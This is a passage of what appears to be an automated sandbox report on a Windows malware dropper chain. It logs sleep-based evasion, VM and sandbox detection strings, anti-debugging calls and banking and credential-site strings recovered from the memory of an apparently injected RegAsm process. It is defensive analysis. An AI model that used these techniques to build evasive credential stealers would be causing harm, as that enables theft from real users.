                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416Thread sleep time: -8494245s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852Thread sleep count: 118 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852Thread sleep time: -236118s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876Thread sleep count: 120 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876Thread sleep time: -240120s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848Thread sleep count: 8501 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848Thread sleep time: -17010501s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816Thread sleep count: 297 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816Thread sleep time: -1782000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076Thread sleep count: 45 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076Thread sleep time: -90045s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080Thread sleep count: 47 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080Thread sleep time: -94047s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060Thread sleep count: 45 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060Thread sleep time: -90045s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036Thread sleep count: 337 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036Thread sleep time: -2022000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084Thread sleep count: 36 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084Thread sleep time: -72036s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064Thread sleep count: 43 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064Thread sleep time: -86043s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072Thread sleep count: 49 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072Thread sleep time: -98049s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512Thread sleep time: -58750s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512Thread sleep time: -58560s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456Thread sleep count: 1181 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456Thread sleep time: -2363181s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256Thread sleep count: 1165 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256Thread sleep time: -2331165s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776Thread sleep count: 1156 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776Thread sleep time: -2313156s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076Thread sleep count: 392 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076Thread sleep time: -2352000s >= -30000sJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460Thread sleep count: 1141 > 30Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460Thread sleep time: -2283141s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2332Thread sleep time: -34017s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044Thread sleep count: 33 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044Thread sleep time: -198000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 5332Thread sleep time: -32016s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484Thread sleep count: 1111 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484Thread sleep time: -2223111s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432Thread sleep count: 1104 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432Thread sleep time: -2209104s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016Thread sleep count: 1116 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016Thread sleep time: -2233116s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312Thread sleep count: 383 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312Thread sleep time: -11490000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760Thread sleep count: 1098 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760Thread sleep time: -2197098s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012Thread sleep count: 1139 > 30
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012Thread sleep time: -2279139s >= -30000s
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712Thread sleep count: 1205 > 30
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712Thread sleep time: -2411205s >= -30000s
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104Thread sleep count: 1075 > 30
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104Thread sleep time: -2151075s >= -30000s
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036Thread sleep count: 1081 > 30
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036Thread sleep time: -2163081s >= -30000s
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540Thread sleep count: 398 > 30
                                    Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540Thread sleep time: -2388000s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 2856Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6336Thread sleep time: -3689348814741908s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4128Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeThread sleep count: Count: 5856 delay: -10Jump to behavior
                                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E2C2A2 FindFirstFileExW,17_2_00E2C2A2
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E668EE FindFirstFileW,FindClose,17_2_00E668EE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,17_2_00E6698F
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00E5D076
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00E5D3A9
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00E69642
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_00E6979D
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,17_2_00E5DBBE
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,17_2_00E69B2B
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose,17_2_00E65C97
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeCode function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,17_2_00DF42DE
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData\Local
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\AppData
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                                    Source: Amcache.hve.21.drBinary or memory string: VMware
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                                    Source: Amcache.hve.21.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                                    Source: skotes.exe, 0000000B.00000002.3769918015.000000000148B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 00000013.00000002.2673207759.0000000001019000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3769503003.0000000001480000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware38
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                                    Source: Amcache.hve.21.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                                    Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware*
                                    Source: Amcache.hve.21.drBinary or memory string: vmci.sys
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                                    Source: axplong.exe, 0000001B.00000002.3769503003.000000000143D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@vH
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                                    Source: Amcache.hve.21.drBinary or memory string: VMware20,1
                                    Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                    Source: Amcache.hve.21.drBinary or memory string: NECVMWar VMware SATA CD00
                                    Source: Amcache.hve.21.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                                    Source: Amcache.hve.21.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                    Source: RegAsm.exe, 00000021.00000002.2777212382.000000000633A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
                                    Source: Amcache.hve.21.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                    Source: Amcache.hve.21.drBinary or memory string: VMware PCI VMCI Bus Device
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                                    Source: Amcache.hve.21.drBinary or memory string: VMware VMCI Bus Device
                                    Source: Amcache.hve.21.drBinary or memory string: VMware Virtual RAM
                                    Source: Amcache.hve.21.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                    Source: Amcache.hve.21.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                                    Source: Amcache.hve.21.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                    Source: 3ec4738210.exe, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                                    Source: Amcache.hve.21.drBinary or memory string: VMware Virtual USB Mouse
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                                    Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin
                                    Source: Amcache.hve.21.drBinary or memory string: VMware, Inc.
                                    Source: b74664dd7e.exe, 0000000E.00000002.2586371888.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware~
                                    Source: Amcache.hve.21.drBinary or memory string: VMware20,1hbin@
                                    Source: Amcache.hve.21.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                                    Source: Amcache.hve.21.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                                    Source: b74664dd7e.exe, 0000000E.00000002.2586371888.000000000132E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
                                    Source: Amcache.hve.21.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                                    Source: file.exe, 00000006.00000003.1307057377.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\hl
                                    Source: b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                    Source: Amcache.hve.21.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                                    Source: Amcache.hve.21.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                                    Source: b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001315000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                                    Source: Amcache.hve.21.drBinary or memory string: vmci.syshbin`
                                    Source: Amcache.hve.21.drBinary or memory string: \driver\vmci,\driver\pci
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                                    Source: Amcache.hve.21.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                                    Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001297000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWE
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                                    Source: Amcache.hve.21.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                                    Source: file.exe, 00000006.00000002.1318517366.0000000000F98000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000008.00000002.1352700970.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 0000000B.00000002.3757207811.0000000000FA8000.00000040.00000001.01000000.00000007.sdmp, 3ec4738210.exe, 0000000D.00000002.1975346461.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 0000000E.00000002.2584529637.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                    Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    barindex
                                    Found API chain indicative of debugger detection
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_17-95147
                                    Hides threads from debuggers
                                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebugger
                                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
